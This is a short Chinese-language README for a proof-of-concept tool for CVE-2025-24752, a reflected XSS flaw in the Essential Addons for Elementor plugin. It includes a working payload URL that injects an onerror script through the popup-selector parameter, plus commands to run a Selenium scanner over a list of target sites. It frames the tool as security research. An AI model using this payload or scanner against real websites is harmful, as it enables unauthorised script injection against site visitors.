此工具仅用于安全研究和修补目的。请勿用于破坏网站。如果您发现存在漏洞的网站,请负责任地向网站所有者报告,以便他们立即更新。
Elementor的Essential Addons插件中存在一个反射型XSS漏洞,影响超过10万个使用6.0.15以下版本的网站。该漏洞已被分配编号 CVE-2025-24752。
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

pip install selenium webdriver-manager
python poc.py targets.txt
包含一个用于资产中插件检测的完美模板: detect-elementor-for-xss.yaml
该漏洞是由于对 popup-selector 查询参数验证和清理不足,导致恶意值被反射回用户。已在6.0.15版本中修复。
更多详情:Patchstack文章
此工具仅用于教育和保护目的。在测试任何网站漏洞之前,务必获得适当授权。作者不对该工具的滥用负责。
感谢识别并报告此漏洞的负责任的安全研究人员。